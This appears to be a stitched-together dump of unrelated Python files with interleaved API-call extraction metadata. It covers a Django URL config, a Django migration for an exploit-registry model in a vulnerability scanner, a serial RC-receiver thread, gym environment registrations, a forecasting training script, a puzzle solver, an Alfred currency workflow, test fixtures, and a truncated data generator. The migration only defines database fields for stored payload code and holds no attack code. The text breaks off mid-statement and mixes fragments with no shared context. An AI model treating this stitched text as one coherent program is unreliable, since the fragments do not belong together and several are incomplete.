'tkinter.PhotoImage', ([], {'file': 'self.prvaKartaDealer'}), '(file=self.prvaKartaDealer)\n', (29898, 29925), False, 'import tkinter\n'), ((30245, 30291), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.drugaKartaDealer'}), '(file=self.drugaKartaDealer)\n', (30263, 30291), False, 'import tkinter\n'), ((30485, 30526), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': '"""karte/back.gif"""'}), "(file='karte/back.gif')\n", (30503, 30526), False, 'import tkinter\n'), ((14668, 14738), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.sezKartIgralec[self.indexIgralceveKarte]'}), '(file=self.sezKartIgralec[self.indexIgralceveKarte])\n', (14686, 14738), False, 'import tkinter\n'), ((18943, 19013), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.sezKartDealer[self.indexDealerjeveKarte]'}), '(file=self.sezKartDealer[self.indexDealerjeveKarte])\n', (18961, 19013), False, 'import tkinter\n'), ((24211, 24243), 'math.ceil', 'math.ceil', (['(0.5 * self.vsotaStave)'], {}), '(0.5 * self.vsotaStave)\n', (24220, 24243), False, 'import math\n')] |
from django.urls import path
from datahub.investment.summary.views import IProjectSummaryView
urlpatterns = [
path(
'adviser/<uuid:adviser_pk>/investment-summary',
IProjectSummaryView.as_view(),
name='investment-summary-item',
),
]
| [
"datahub.investment.summary.views.IProjectSummaryView.as_view"
] | [((187, 216), 'datahub.investment.summary.views.IProjectSummaryView.as_view', 'IProjectSummaryView.as_view', ([], {}), '()\n', (214, 216), False, 'from datahub.investment.summary.views import IProjectSummaryView\n')] |
# Generated by Django 4.0.1 on 2022-03-10 17:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('Assets', '0003_alter_assetlist_timestamp_alter_assettask_timestamp'),
('VulnerableScan', '0003_alter_exploitregister_timestamp_and_more'),
]
operations = [
migrations.RemoveField(
model_name='exploitregister',
name='file_object',
),
migrations.AddField(
model_name='exploitregister',
name='code',
field=models.TextField(db_column='code', null=True, verbose_name='负载代码'),
),
migrations.AddField(
model_name='exploitregister',
name='debug_info',
field=models.TextField(blank=True, db_column='debug_info', default='', null=True, verbose_name='调试信息'),
),
migrations.AddField(
model_name='exploitregister',
name='function_name',
field=models.CharField(db_column='function_name', default='', max_length=100, verbose_name='函数名称'),
),
migrations.AddField(
model_name='exploitregister',
name='target',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='Assets.assetlist', verbose_name='调试目标'),
),
migrations.AlterField(
model_name='exploitregister',
name='description',
field=models.TextField(db_column='description', verbose_name='负载描述'),
),
]
| [
"django.db.models.ForeignKey",
"django.db.migrations.RemoveField",
"django.db.models.TextField",
"django.db.models.CharField"
] | [((377, 449), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""exploitregister"""', 'name': '"""file_object"""'}), "(model_name='exploitregister', name='file_object')\n", (399, 449), False, 'from django.db import migrations, models\n'), ((600, 666), 'django.db.models.TextField', 'models.TextField', ([], {'db_column': '"""code"""', 'null': '(True)', 'verbose_name': '"""负载代码"""'}), "(db_column='code', null=True, verbose_name='负载代码')\n", (616, 666), False, 'from django.db import migrations, models\n'), ((799, 899), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'db_column': '"""debug_info"""', 'default': '""""""', 'null': '(True)', 'verbose_name': '"""调试信息"""'}), "(blank=True, db_column='debug_info', default='', null=True,\n verbose_name='调试信息')\n", (815, 899), False, 'from django.db import migrations, models\n'), ((1031, 1127), 'django.db.models.CharField', 'models.CharField', ([], {'db_column': '"""function_name"""', 'default': '""""""', 'max_length': '(100)', 'verbose_name': '"""函数名称"""'}), "(db_column='function_name', default='', max_length=100,\n verbose_name='函数名称')\n", (1047, 1127), False, 'from django.db import migrations, models\n'), ((1252, 1386), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""Assets.assetlist"""', 'verbose_name': '"""调试目标"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, to='Assets.assetlist', verbose_name='调试目标')\n", (1269, 1386), False, 'from django.db import migrations, models\n'), ((1517, 1579), 'django.db.models.TextField', 'models.TextField', ([], {'db_column': '"""description"""', 'verbose_name': '"""负载描述"""'}), "(db_column='description', verbose_name='负载描述')\n", (1533, 1579), False, 'from django.db import migrations, models\n')] |
import datetime
import logging
import re
import serial
import sys
import termios
import threading
import time
import tty
import configuration
class RCReader(threading.Thread):
sp = None
start_called = False
chassis = None
def __init__(self, group = None, target = None, name = None,
args = (), kwargs = None, verbose = None):
threading.Thread.__init__(self, group=group, target = target, name = name,
verbose = verbose)
self.args = args
self.kwargs = kwargs
self.chassis = args[0]
self.on = True
return
def start(self):
if self.start_called:
raise RunTimeError
self.start_called = True
# Read parameter file
config = configuration.configuration("rc_receiver")
connectparams = config.load()['connect']
# Open serial port with parameters
s = serial.Serial()
s.baudrate = connectparams['baudrate']
s.port = connectparams['port']
s.timeout = connectparams['timeout']
s.open()
if s.is_open:
self.sp = s
i = 0 # Just read some lines
line = self.sp.readline()
while line and i < 10:
line = self.sp.readline()
i += 1
super(RCReader, self).start()
def cancel(self):
self.on = False
def run(self):
last_time = datetime.datetime(1970, 1, 1)
rc_use_input_time = datetime.datetime(1970, 1, 1)
send_stop = 0
last_rc = [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ]
while self.on:
line = self.sp.readline()
m = re.match('I ([-\d.]+) +([-\d.]+) +([-\d.]+) +([-\d.]+) +([-\d.]+) +([-\d.]+) +([-\d.]+) +([-\d.]+)', line)
if m != None:
t = datetime.datetime.utcnow()
if (t - last_time).total_seconds() > 0.05:
last_time = t
# logging.getLogger('werkzeug').error("%s: rc_receiver.run(%f, %f, %f)" % (datetime.datetime.utcnow().strftime("%H%M%S.%f"), float(m.group(1)), float(m.group(3)), float(m.group(5))))
angle = (float(m.group(1)) - 1500.0) / 5.0
throttle = (float(m.group(3)) - 1500.0) / 5.0
rc_use = float(m.group(5)) - 1500.0
if rc_use > -450 and rc_use < 450:
logging.getLogger('werkzeug').error("%s: rc_receiver.run() messed up last: %f, %f, %f, %f, %f, %f, %f, %f now %f, %f, %f, %f, %f, %f, %f, %f" %
(datetime.datetime.utcnow().strftime("%H%M%S.%f"),
last_rc[0], last_rc[1], last_rc[2], last_rc[3], last_rc[4], last_rc[5], last_rc[6], last_rc[7],
float(m.group(1)), float(m.group(2)), float(m.group(3)), float(m.group(4)), float(m.group(5)), float(m.group(6)), float(m.group(7)), float(m.group(8))))
last_rc[0] = float(m.group(1))
last_rc[1] = float(m.group(2))
last_rc[2] = float(m.group(3))
last_rc[3] = float(m.group(4))
last_rc[4] = float(m.group(5))
last_rc[5] = float(m.group(6))
last_rc[6] = float(m.group(7))
last_rc[7] = float(m.group(8))
continue
last_rc[0] = float(m.group(1))
last_rc[1] = float(m.group(2))
last_rc[2] = float(m.group(3))
last_rc[3] = float(m.group(4))
last_rc[4] = float(m.group(5))
last_rc[5] = float(m.group(6))
last_rc[6] = float(m.group(7))
last_rc[7] = float(m.group(8))
if rc_use < 0.0:
self.chassis.use_rc_input = False
rc_use_input_time = datetime.datetime(1970, 1, 1)
else:
rc_use_input_time = datetime.datetime.utcnow()
self.chassis.use_rc_input = True
if angle > 100.0:
angle = 100.0
elif angle < - 100.0:
angle = -100.0
if throttle > 100.0:
throttle = 100.0
elif throttle < -100.0:
throttle = -100.0
# print("angle: %f throttle: %f" % (angle, throttle))
radius_inf = False
if angle >= -6.0 and angle <= 6.0:
radius = float("inf")
radius_inf = True
elif angle > 1.0:
radius = self.chassis.minRadius + (self.chassis.maxRadius - self.chassis.minRadius) * (100.0 - angle) / 100.0
else:
radius = - self.chassis.minRadius - (self.chassis.maxRadius - self.chassis.minRadius) * (100.0 + angle) / 100.0
if throttle >= -5.0 and throttle <= 5.0:
throttle = 0.0
# logging.getLogger('werkzeug').error("run(%f, %f, %d, %d)" % (throttle, radius, int(radius_inf), send_stop))
if throttle != 0.0 or radius_inf == False:
send_stop = 0
self.chassis.ensureready()
self.chassis.move_velocity_radius(throttle, radius)
elif send_stop < 1:
send_stop = 1
self.chassis.ensureready()
self.chassis.move_velocity_radius(throttle, radius)
if (datetime.datetime.utcnow() - rc_use_input_time).total_seconds() > 2.0:
self.chassis.use_rc_input = False
self.sp.close()
# t = RCReader()
# t.setDaemon(True)
# t.start()
# class Getch:
# def __call__(self):
# fd = sys.stdin.fileno()
# old_settings = termios.tcgetattr(fd)
# try:
# tty.setraw(sys.stdin.fileno())
# ch = sys.stdin.read(1)
# finally:
# termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
# return ch
#
#
# getch = Getch()
# c = getch().lower()
# while c != 'q':
# time.sleep(100)
| [
"datetime.datetime",
"threading.Thread.__init__",
"logging.getLogger",
"datetime.datetime.utcnow",
"re.match",
"serial.Serial",
"configuration.configuration"
] | [((370, 461), 'threading.Thread.__init__', 'threading.Thread.__init__', (['self'], {'group': 'group', 'target': 'target', 'name': 'name', 'verbose': 'verbose'}), '(self, group=group, target=target, name=name,\n verbose=verbose)\n', (395, 461), False, 'import threading\n'), ((787, 829), 'configuration.configuration', 'configuration.configuration', (['"""rc_receiver"""'], {}), "('rc_receiver')\n", (814, 829), False, 'import configuration\n'), ((943, 958), 'serial.Serial', 'serial.Serial', ([], {}), '()\n', (956, 958), False, 'import serial\n'), ((1501, 1530), 'datetime.datetime', 'datetime.datetime', (['(1970)', '(1)', '(1)'], {}), '(1970, 1, 1)\n', (1518, 1530), False, 'import datetime\n'), ((1559, 1588), 'datetime.datetime', 'datetime.datetime', (['(1970)', '(1)', '(1)'], {}), '(1970, 1, 1)\n', (1576, 1588), False, 'import datetime\n'), ((1751, 1875), 're.match', 're.match', (['"""I ([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+)"""', 'line'], {}), "(\n 'I ([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+) +([-\\\\d.]+)'\n , line)\n", (1759, 1875), False, 'import re\n'), ((1904, 1930), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (1928, 1930), False, 'import datetime\n'), ((4049, 4078), 'datetime.datetime', 'datetime.datetime', (['(1970)', '(1)', '(1)'], {}), '(1970, 1, 1)\n', (4066, 4078), False, 'import datetime\n'), ((4149, 4175), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (4173, 4175), False, 'import datetime\n'), ((5949, 5975), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (5973, 5975), False, 'import datetime\n'), ((2494, 2523), 'logging.getLogger', 'logging.getLogger', (['"""werkzeug"""'], {}), "('werkzeug')\n", (2511, 2523), False, 'import logging\n'), ((2668, 2694), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (2692, 2694), False, 'import datetime\n')] |
__copyright__ = "Copyright (c) Microsoft Corporation and Mila - Quebec AI Institute"
__license__ = "MIT"
import os
import pickle
import time
from typing import Callable
import warnings
from gym import register
_SIM = None
ASSET_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "resources")
def get_sim():
"""Gets the sim, if set.
:return: the simulator.
"""
if _SIM is None:
raise RuntimeError("Simulator not set yet")
return _SIM
def set_sim(sim):
global _SIM
if _SIM is not None:
warnings.warn(
"Overwriting sim. This can have unexpected "
"consequences if using old sim objects somewhere."
)
_SIM = sim
def timeit(fn: Callable):
def timed_fn(*args, **kwargs):
t0 = time.time()
out = fn(*args, **kwargs)
t1 = time.time()
if _SIM is not None:
if len(args) > 0:
key = f"{args[0].__class__.__name__}.{fn.__name__}_time"
else:
key = f"{fn.__name__}_time"
_SIM.update_results(key, t1 - t0)
return out
return timed_fn
def load_sim_from_file(path):
"""Loads a simulator from file.
This uses pickle, so the simulator loaded will have its associated code
intact. This can make the loaded sim incompatible with newer code.
:param path: Path to pickle file.
:return: Simulator.
"""
with open(path, "rb") as f:
sim = pickle.load(f)
set_sim(sim)
return sim
# The following block of code pre-registers a set of default configurations
# that can be used via env = gym.make('empty-easy-rgb') for example.
task_names = ["empty", "objects", "tiles"]
difficulties = ["easy", "medium", "hard"]
observations = ["rgb"]
task_classes = [("v0", "PuttPutt"), ("v1", "PuttPuttNegDist")]
for task_version, task_class in task_classes:
for task in task_names:
for difficulty in difficulties:
for observation in observations:
for n_entities in [1, 2, 3]:
if task == "empty" and n_entities == 1:
env_name = f"Segar-{task}-{difficulty}-{observation}-{task_version}"
# print(env_name)
register(
id=env_name,
entry_point="segar.envs:SEGARSingleEnv",
kwargs={
"env_name": f"{task}-{difficulty}-{observation}",
"task_class": task_class,
},
max_episode_steps=100,
)
elif task != "empty":
env_name = (
f"Segar-{task}x{n_entities}-{difficulty}-"
f"{observation}-{task_version}"
)
# print(env_name)
register(
id=env_name,
entry_point="segar.envs:SEGARSingleEnv",
kwargs={
"env_name": f"{task}x{n_entities}-{difficulty}-" f"{observation}",
"task_class": task_class,
},
max_episode_steps=100,
)
# Current Envs (update as needed)
# Segar-empty-easy-rgb-v0
# Segar-empty-medium-rgb-v0
# Segar-empty-hard-rgb-v0
# Segar-objectsx1-easy-rgb-v0
# Segar-objectsx2-easy-rgb-v0
# Segar-objectsx3-easy-rgb-v0
# Segar-objectsx1-medium-rgb-v0
# Segar-objectsx2-medium-rgb-v0
# Segar-objectsx3-medium-rgb-v0
# Segar-objectsx1-hard-rgb-v0
# Segar-objectsx2-hard-rgb-v0
# Segar-objectsx3-hard-rgb-v0
# Segar-tilesx1-easy-rgb-v0
# Segar-tilesx2-easy-rgb-v0
# Segar-tilesx3-easy-rgb-v0
# Segar-tilesx1-medium-rgb-v0
# Segar-tilesx2-medium-rgb-v0
# Segar-tilesx3-medium-rgb-v0
# Segar-tilesx1-hard-rgb-v0
# Segar-tilesx2-hard-rgb-v0
# Segar-tilesx3-hard-rgb-v0
# Segar-empty-easy-rgb-v1
# Segar-empty-medium-rgb-v1
# Segar-empty-hard-rgb-v1
# Segar-objectsx1-easy-rgb-v1
# Segar-objectsx2-easy-rgb-v1
# Segar-objectsx3-easy-rgb-v1
# Segar-objectsx1-medium-rgb-v1
# Segar-objectsx2-medium-rgb-v1
# Segar-objectsx3-medium-rgb-v1
# Segar-objectsx1-hard-rgb-v1
# Segar-objectsx2-hard-rgb-v1
# Segar-objectsx3-hard-rgb-v1
# Segar-tilesx1-easy-rgb-v1
# Segar-tilesx2-easy-rgb-v1
# Segar-tilesx3-easy-rgb-v1
# Segar-tilesx1-medium-rgb-v1
# Segar-tilesx2-medium-rgb-v1
# Segar-tilesx3-medium-rgb-v1
# Segar-tilesx1-hard-rgb-v1
# Segar-tilesx2-hard-rgb-v1
# Segar-tilesx3-hard-rgb-v1
| [
"gym.register",
"pickle.load",
"os.path.realpath",
"warnings.warn",
"time.time"
] | [((266, 292), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (282, 292), False, 'import os\n'), ((555, 672), 'warnings.warn', 'warnings.warn', (['"""Overwriting sim. This can have unexpected consequences if using old sim objects somewhere."""'], {}), "(\n 'Overwriting sim. This can have unexpected consequences if using old sim objects somewhere.'\n )\n", (568, 672), False, 'import warnings\n'), ((791, 802), 'time.time', 'time.time', ([], {}), '()\n', (800, 802), False, 'import time\n'), ((850, 861), 'time.time', 'time.time', ([], {}), '()\n', (859, 861), False, 'import time\n'), ((1474, 1488), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (1485, 1488), False, 'import pickle\n'), ((2264, 2443), 'gym.register', 'register', ([], {'id': 'env_name', 'entry_point': '"""segar.envs:SEGARSingleEnv"""', 'kwargs': "{'env_name': f'{task}-{difficulty}-{observation}', 'task_class': task_class}", 'max_episode_steps': '(100)'}), "(id=env_name, entry_point='segar.envs:SEGARSingleEnv', kwargs={\n 'env_name': f'{task}-{difficulty}-{observation}', 'task_class':\n task_class}, max_episode_steps=100)\n", (2272, 2443), False, 'from gym import register\n'), ((2971, 3163), 'gym.register', 'register', ([], {'id': 'env_name', 'entry_point': '"""segar.envs:SEGARSingleEnv"""', 'kwargs': "{'env_name': f'{task}x{n_entities}-{difficulty}-{observation}',\n 'task_class': task_class}", 'max_episode_steps': '(100)'}), "(id=env_name, entry_point='segar.envs:SEGARSingleEnv', kwargs={\n 'env_name': f'{task}x{n_entities}-{difficulty}-{observation}',\n 'task_class': task_class}, max_episode_steps=100)\n", (2979, 3163), False, 'from gym import register\n')] |
#!/usr/bin/python 3.7
#-*-coding:utf-8-*-
from torch import nn
import argparse
from progressbar import *
from torch.optim import Adam
import pandas as pd
import numpy as np
from my_tsp.datasets import data_processing
from my_tsp.trainer import train
def main(args):
# 读取数据
data_path = '../data/2-2.csv'
dSet = pd.read_csv(data_path)[['InternalVol', 'InternalIR']].values
print("dSet.shape", dSet.shape)
Data_utils = data_processing.Data_utility(dSet, args.num_obs_to_train, args.predict_seq_len,
args.horizon, args.normalize, args.use_split, args.use_cuda)
# Data = Data_utility(dSet, 0.6, 0.2, args.cuda, args.horizon, args.window, args.normalize);
# 数据归一化
data_scaler = Data_utils.data_normalize(Data_utils.dataset)
# 分割训练集和测试集
# if args.use_split:
Data_utils.train_test_split(Data_utils.dataset)
# 训练
train(args, Data_utils)
# print(Data.rse)
# train(Data, args)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--data', type=str, default='',
help='location of the data file')
parser.add_argument('--horizon', type=int, default=0, help='取训练序列标签时,往后延 horizon 个单位开始取')
parser.add_argument('--normalize', type=str, default='max', help='数据归一化的方式')
parser.add_argument('--model', type=str, default='tpaLSTM', help='')
parser.add_argument('--L1Loss', type=bool, default=False)
parser.add_argument('--save', type=str, default='../model_checkpoints/bt_model.pt',
help='path to save the final model')
parser.add_argument("--num_epoches", "-e", type=int, default=100)
parser.add_argument("--step_per_epoch", "-spe", type=int, default=100)
parser.add_argument("-lr", type=float, default=1e-3)
parser.add_argument("--n_layers", "-nl", type=int, default=1)
parser.add_argument("--hidden_size", "-hs", type=int, default=24)
parser.add_argument('--use_split', type=bool, default=True)
parser.add_argument('--use_cuda', type=bool, default=False)
parser.add_argument("--predict_seq_len", "-psl", type=int, default=720) # 预测未来5天,,144*5
parser.add_argument("--num_obs_to_train", "-not", type=int, default=144*30) # 单个训练序列的长度
parser.add_argument("--num_results_to_sample", "-nrs", type=int, default=10)
parser.add_argument("--show_plot", "-sp", action="store_true")
parser.add_argument("--batch_size", "-b", type=int, default=64)
args = parser.parse_args()
main(args=args)
| [
"my_tsp.trainer.train",
"my_tsp.datasets.data_processing.Data_utility",
"argparse.ArgumentParser",
"pandas.read_csv"
] | [((440, 590), 'my_tsp.datasets.data_processing.Data_utility', 'data_processing.Data_utility', (['dSet', 'args.num_obs_to_train', 'args.predict_seq_len', 'args.horizon', 'args.normalize', 'args.use_split', 'args.use_cuda'], {}), '(dSet, args.num_obs_to_train, args.\n predict_seq_len, args.horizon, args.normalize, args.use_split, args.\n use_cuda)\n', (468, 590), False, 'from my_tsp.datasets import data_processing\n'), ((907, 930), 'my_tsp.trainer.train', 'train', (['args', 'Data_utils'], {}), '(args, Data_utils)\n', (912, 930), False, 'from my_tsp.trainer import train\n'), ((1024, 1049), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1047, 1049), False, 'import argparse\n'), ((325, 347), 'pandas.read_csv', 'pd.read_csv', (['data_path'], {}), '(data_path)\n', (336, 347), True, 'import pandas as pd\n')] |
import numpy as np
import matplotlib.pyplot as plt
with open('input.txt', 'r') as f:
stream = f.readline()
image = np.array(tuple(map(int, stream))).reshape(-1, 6, 25)
nonzero_counts = np.sum(np.count_nonzero(image, axis=2), axis=1)
fewest_zeros_layer = np.argsort(nonzero_counts)[-1]
unique_values, counts = np.unique(image[fewest_zeros_layer], return_counts=True)
value_counts = dict(zip(unique_values, counts))
output_image = np.zeros((6, 25))
image -= 2
for layer in image:
output_image = np.where(output_image != 0, output_image, layer)
print(f'{(value_counts[1] * value_counts[2])=}')
plt.imshow(output_image)
plt.show()
| [
"matplotlib.pyplot.imshow",
"numpy.unique",
"numpy.where",
"numpy.count_nonzero",
"numpy.argsort",
"numpy.zeros",
"matplotlib.pyplot.show"
] | [((316, 372), 'numpy.unique', 'np.unique', (['image[fewest_zeros_layer]'], {'return_counts': '(True)'}), '(image[fewest_zeros_layer], return_counts=True)\n', (325, 372), True, 'import numpy as np\n'), ((437, 454), 'numpy.zeros', 'np.zeros', (['(6, 25)'], {}), '((6, 25))\n', (445, 454), True, 'import numpy as np\n'), ((604, 628), 'matplotlib.pyplot.imshow', 'plt.imshow', (['output_image'], {}), '(output_image)\n', (614, 628), True, 'import matplotlib.pyplot as plt\n'), ((629, 639), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (637, 639), True, 'import matplotlib.pyplot as plt\n'), ((199, 230), 'numpy.count_nonzero', 'np.count_nonzero', (['image'], {'axis': '(2)'}), '(image, axis=2)\n', (215, 230), True, 'import numpy as np\n'), ((261, 287), 'numpy.argsort', 'np.argsort', (['nonzero_counts'], {}), '(nonzero_counts)\n', (271, 287), True, 'import numpy as np\n'), ((505, 553), 'numpy.where', 'np.where', (['(output_image != 0)', 'output_image', 'layer'], {}), '(output_image != 0, output_image, layer)\n', (513, 553), True, 'import numpy as np\n')] |
# encoding: utf-8
import sys
from workflow import Workflow3, ICON_ERROR, ICON_CLOCK, ICON_NETWORK, ICON_SYNC
from workflow.background import run_in_background, is_running
from decimal import Decimal
from fetch import NetworkError
from parse import ParseError, WaitingForInputError, parse_input
"""Request Model
{
"method": "spotRateHistory",
"data": {
"base": "JPY", // from
"term": "USD", // to
"period": "week"
}
}
"""
"""Response Model
{
"data": {
"CurrentInterbankRate": 0.0097,
"HistoricalPoints":[...]
"fetchTime": 1611425616625
}
}
"""
def main(wf):
if len(wf.args) == 0:
return
arg = wf.args[0]
stream = RealStringIO(arg)
try:
balance, _from, to = parse_input(stream)
if _from == to:
wf.add_item(
title=balance,
subtitle="The exchange rate is 1 :)",
copytext=balance,
)
wf.send_feedback()
return
error = wf.cached_data("error", max_age=0)
if error is not None:
wf.clear_cache(lambda name: name.startswith("error"))
raise Exception(error)
network_error = wf.cached_data("network_error", max_age=0)
if network_error is not None:
wf.clear_cache(lambda name: name.startswith("network_error"))
raise NetworkError(error)
cache_key = _from + "_" + to
if not is_running("fetch") and not wf.cached_data_fresh(
cache_key, 28800
): # seconds, 8 hours to be expired
run_in_background(
"fetch",
["/usr/bin/python", wf.workflowfile("fetch.py"), _from, to],
)
if is_running("fetch"):
wf.rerun = 0.5
wf.add_item(title="Fetching...", icon=ICON_SYNC)
else:
exchange_rate, last_fetch_time = wf.cached_data(
cache_key, max_age=0
) # now can safely pull the data from cache
result = Decimal(balance) * Decimal(exchange_rate)
print_val = "{0:f}".format(result.normalize())
wf.add_item(
title=print_val,
subtitle="Fetch time: %s" % (last_fetch_time),
copytext=print_val,
)
except WaitingForInputError as we:
wf.add_item(title="Waiting for more input", subtitle=str(we), icon=ICON_CLOCK)
except NetworkError as ne:
wf.add_item(title="Network Error", subtitle=str(ne), icon=ICON_NETWORK)
except ParseError:
pass
except Exception as pe:
wf.add_item(title="Error", subtitle=str(pe), icon=ICON_ERROR)
wf.send_feedback()
class RealStringIO:
def __init__(self, initial_value=""):
self._value = initial_value
self._len = len(initial_value)
self._cursor = 0
def read(self):
if self._cursor >= self._len:
return ""
c = self._value[self._cursor]
self._cursor += 1
return c
def readable(self):
return self._cursor < self._len
if __name__ == "__main__":
wf = Workflow3()
sys.exit(wf.run(main)) | [
"workflow.Workflow3",
"fetch.NetworkError",
"parse.parse_input",
"decimal.Decimal",
"workflow.background.is_running"
] | [((3149, 3160), 'workflow.Workflow3', 'Workflow3', ([], {}), '()\n', (3158, 3160), False, 'from workflow import Workflow3, ICON_ERROR, ICON_CLOCK, ICON_NETWORK, ICON_SYNC\n'), ((763, 782), 'parse.parse_input', 'parse_input', (['stream'], {}), '(stream)\n', (774, 782), False, 'from parse import ParseError, WaitingForInputError, parse_input\n'), ((1753, 1772), 'workflow.background.is_running', 'is_running', (['"""fetch"""'], {}), "('fetch')\n", (1763, 1772), False, 'from workflow.background import run_in_background, is_running\n'), ((1397, 1416), 'fetch.NetworkError', 'NetworkError', (['error'], {}), '(error)\n', (1409, 1416), False, 'from fetch import NetworkError\n'), ((1470, 1489), 'workflow.background.is_running', 'is_running', (['"""fetch"""'], {}), "('fetch')\n", (1480, 1489), False, 'from workflow.background import run_in_background, is_running\n'), ((2052, 2068), 'decimal.Decimal', 'Decimal', (['balance'], {}), '(balance)\n', (2059, 2068), False, 'from decimal import Decimal\n'), ((2071, 2093), 'decimal.Decimal', 'Decimal', (['exchange_rate'], {}), '(exchange_rate)\n', (2078, 2093), False, 'from decimal import Decimal\n')] |
# pylint: disable=wildcard-import, unused-wildcard-import, redefined-outer-name
# pylint: disable=C0415
import pytest
@pytest.fixture(name="logging_app")
def _logging_app():
from app import app
return app.test_client()
@pytest.fixture(name="query_utils")
def _utils():
from bot_logging_server.storage.mysql import utils
return utils
@pytest.fixture(name="logs")
def _logs():
from bot_logging_server.models.mysql import logs
return logs
| [
"pytest.fixture",
"app.app.test_client"
] | [((121, 155), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""logging_app"""'}), "(name='logging_app')\n", (135, 155), False, 'import pytest\n'), ((233, 267), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""query_utils"""'}), "(name='query_utils')\n", (247, 267), False, 'import pytest\n'), ((358, 385), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""logs"""'}), "(name='logs')\n", (372, 385), False, 'import pytest\n'), ((212, 229), 'app.app.test_client', 'app.test_client', ([], {}), '()\n', (227, 229), False, 'from app import app\n')] |
#!/usr/bin/env python
import glob,os
import numpy as np
from bunch import Bunch
import mygis as io
import load_data
def adjust_p(p,h,dz):
'''Convert p [Pa] at elevation h [m] by shifting its elevation by dz [m]'''
# p in pascals
# h,dz in meters
# slp = p/(1 - 2.25577E-5*h)**5.25588
# p=slp*(1 - 2.25577E-5*(h+dz))**5.25588
p*=(1 - 2.25577E-5*(h+dz))**5.25588
def update_base(base,filename,nz):
data=load_data.cols(filename)
nz=min(data.shape[0]-1,nz)
base.z=data[:nz,0]
base.dz=np.diff(data[:nz+1,0]).reshape((1,nz,1,1))
base.th=data[:nz,1].reshape((1,nz,1,1))
base.qv=data[:nz,2].reshape((1,nz,1,1))/1000.0
def main():
filename="bc"
nx,ny,nz,nt=(20.,20,10,24)
dims=[nt,nz,ny,nx]
lonmin=-110.0; lonmax=-100.0; dlon=(lonmax-lonmin)/nx
latmin=35.0; latmax=45.0; dlat=(latmax-latmin)/ny
base=Bunch(u=10.0,w=0.0,v=0.0,
qv=0.0013,qc=0.0,
p=100000.0,
th=np.arange(273.0,300,(300-273.0)/nz).reshape((1,nz,1,1)),
dz=400.0)
base.z=np.arange(0,nz*base.dz,base.dz)
if glob.glob("sounding.txt"):
update_base(base,"sounding.txt",nz)
nz=base.th.size
dims=[nt,nz,ny,nx]
u=np.zeros(dims,dtype="f")+base.u
w=np.zeros(dims,dtype="f")+base.w
v=np.zeros(dims,dtype="f")+base.v
qv=np.zeros(dims,dtype="f")+base.qv
qc=np.zeros(dims,dtype="f")+base.qc
coscurve=np.cos(np.arange(dims[2])/dims[2]*2*np.pi+np.pi)+1
hgt=(coscurve*1000).reshape((1,nx)).repeat(ny,axis=0)
lon=np.arange(lonmin,lonmax,dlon)
lat=np.arange(latmin,latmax,dlat)
lon,lat=np.meshgrid(lon,lat)
dz=np.zeros(dims)+base.dz
z=np.zeros(dims,dtype="f")+base.z.reshape((1,nz,1,1))+hgt.reshape((1,1,ny,nx))
layer1=(dz[0,0,:,:]/2)
z[0,0,:,:]+=layer1
for i in range(1,int(nz)):
z[:,i,:,:]=z[:,i-1,:,:]+(dz[:,i-1,:,:]+dz[:,i,:,:])/2.0
p=np.zeros(dims,dtype="f")+base.p
adjust_p(p,0.0,z)
th=np.zeros(dims,dtype="f")+base.th
d4dname=("t","z","y","x")
d3dname=("z","y","x")
d2dname=("y","x")
othervars=[Bunch(data=v, name="V", dims=d4dname,dtype="f",attributes=dict(units="m/s", description="Horizontal (y) wind speed")),
Bunch(data=w, name="W", dims=d4dname,dtype="f",attributes=dict(units="m/s", description="Vertical wind speed")),
Bunch(data=qv, name="QVAPOR",dims=d4dname,dtype="f",attributes=dict(units="kg/kg",description="Water vapor mixing ratio")),
Bunch(data=qc, name="QCLOUD",dims=d4dname,dtype="f",attributes=dict(units="kg/kg",description="Cloud water mixing ratio")),
Bunch(data=p, name="P", dims=d4dname,dtype="f",attributes=dict(units="Pa", description="Pressure")),
Bunch(data=th, name="T", dims=d4dname,dtype="f",attributes=dict(units="K", description="Potential temperature")),
Bunch(data=dz, name="dz", dims=d4dname,dtype="f",attributes=dict(units="m", description="Layer thickness")),
Bunch(data=z, name="Z", dims=d4dname,dtype="f",attributes=dict(units="m", description="Layer Height AGL")),
Bunch(data=lat,name="XLAT", dims=d2dname,dtype="f",attributes=dict(units="deg", description="Latitude")),
Bunch(data=lon,name="XLONG", dims=d2dname,dtype="f",attributes=dict(units="deg", description="Longitude")),
